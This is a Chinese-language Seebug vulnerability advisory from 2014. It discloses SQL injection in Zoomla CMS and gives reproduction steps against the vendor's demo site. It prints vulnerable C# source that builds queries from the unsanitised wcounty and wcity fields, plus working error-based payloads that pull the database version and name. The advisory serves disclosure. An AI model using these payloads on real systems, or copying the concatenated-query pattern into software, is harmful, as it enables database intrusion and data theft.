逐浪cms sql注入 一个文件 多个参数

2014-08-09T00:00:00
ID SSV:94249
Type seebug
Reporter Root
Modified 2014-08-09T00:00:00

Description

简要描述:

逐浪cms最新版sql注入

详细说明:

逐浪最新版 sql注入 可以注册普通用户 访问

http://demo.zoomla.cn/User/Register.aspx

随便注册一个用户 test1234 密码123456 访问

http://demo.zoomla.cn/User/Login.aspx?ReturnUrl=

登录 访问

http://demo.zoomla.cn/User/UserFriend/FriendSearch/Friend_quickSYResult.aspx

源码如下

protected void Page_Load(object sender, EventArgs e) { if (!base.IsPostBack) { string str = base.Request.Form["sex"]; string str2 = base.Request.Form["age1"]; string str3 = base.Request.Form["age2"]; string str4 = base.Request.Form["wcounty"]; //没处理 string str5 = base.Request.Form["wcity"]; //没处理 string wherex = ""; if (!string.IsNullOrEmpty(str)) { if (str == "女生") { wherex = wherex + " and UserSex=0"; } else if (str == "男生") { wherex = wherex + " and UserSex=1"; } } if (!string.IsNullOrEmpty(str2)) { string str7 = DateTime.Now.AddYears(-Convert.ToInt32(str2)).ToShortDateString(); wherex = wherex + " and BirthDay<='" + str7 + "'"; } if (!string.IsNullOrEmpty(str3)) { string str8 = DateTime.Now.AddYears(-Convert.ToInt32(str3)).ToShortDateString(); wherex = wherex + " and BirthDay>='" + str8 + "'"; } if (!string.IsNullOrEmpty(str4)) { wherex = wherex + " and workProvince='" + str4 + "'"; //存在注入 if (!string.IsNullOrEmpty(str5)) { wherex = wherex + " and workCity='" + str5 + "'"; //存在注入 } } this.ViewState["wherex"] = wherex; if (!this.buser.CheckLogin()) { if (SiteConfig.UserConfig.EnableCheckCodeOfLogin) { this.PhValCode.Visible = true; } else { this.PhValCode.Visible = false; } this.dwindow.Style["display"] = ""; } else { DataTable dt = new DataTable(); dt = UserTableBLL.GetUsersInfo(wherex); this.Bind(dt); } } }

访问

http://demo.zoomla.cn/User\UserFriend\FriendSearch/Friend_quickSYResult.aspx

提交

sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT @@VERSION)>0 --

<img src="https://images.seebug.org/upload/201408/052032050cd5b7eaa837144bd5dca6aa1c7c04ad.png" alt="71.png" width="600" onerror="javascript:errimg(this);">

提交

sex=%E7%94%B7%E7%94%9F&age1=&age2=&wcounty=16&wcity=16%3A01' AND (SELECT db_name())&gt;0 --

<img src="https://images.seebug.org/upload/201408/052033050d663cbbe916ff39b7dd948e352115b8.png" alt="72.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

漏洞证明如上